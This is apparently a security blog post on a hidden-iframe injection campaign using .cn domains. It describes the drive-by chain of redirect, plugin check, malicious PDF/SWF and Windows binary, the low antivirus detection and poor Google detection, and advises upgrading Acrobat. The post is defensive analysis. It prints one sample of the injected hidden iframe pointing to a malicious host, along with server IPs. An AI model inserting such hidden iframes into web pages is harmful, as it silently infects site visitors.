New week, new leader. I mean various hidden iframes from .cn domains injected at the bottom of home pages.
The html code looks like this
<iframe src="http: //lotmachinesguide .cn/ in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>
The domain names may vary but they always end with .cn. The domain names usually contain words lot and bet. They all reside on the same server with the IP address 94 .247 .3 .150. The iframes load pages with paths similar to “in.cgi?incomeNN”, where NN is some arbitrary number.
Here is a list of domains used in this malware campaign:
As most other iframe injection exploits, this one can be easily detected by Unmask Parasites. You will see hidden iframes in the “External References” section.
Sometimes you can see more then one iframe injected into the same web page.
To my surprise these iframes are poorly detected by Google. Many compromised web sites are still not listed as suspicious. And the majority of the .cn domains used in this attack are not blacklisted either. (I’ve been submitting the malicious domains to Google for the last couple of days, to no avail.)
When Google detects the malicious content you will see the follow text on Safe Browsing diagnostic pages: “Malicious software is hosted on 1 domain(s), including hyperliteautoservices .cn/.”
This happens because the initial pages in the iframes redirect to a malicious script on hyperliteautoservices .cn, that checks plugins installed in a visitor’s browser and downloads either an infected PDF file or a Flash (swf) file (browsers automatically open such files). This happens behind the scenes, so people would never know about the infection.
These files change every day which makes virus detection very problematic. I sent both files to VirusTotal and the detection rates were very low: 5/40 for readme.pdf and 2/40 for flash.swf . None of major anti-virus tools detected these files.
If you are still using Acrobat Reader 8.1.2 or older, upgrade ASAP. The current version is 9.1.
This PDF file silently downloads a malicious binary (Windows executable) file from litehitscar .cn, which resides on the same server with hyperliteautoservices .cn (IP 94 .247 .3 .151). According to VirusTotal, the detection rate of this malware is very low – 3/40.
If you have any additional information on this issue or want to ask a question, consider leaving a comment below.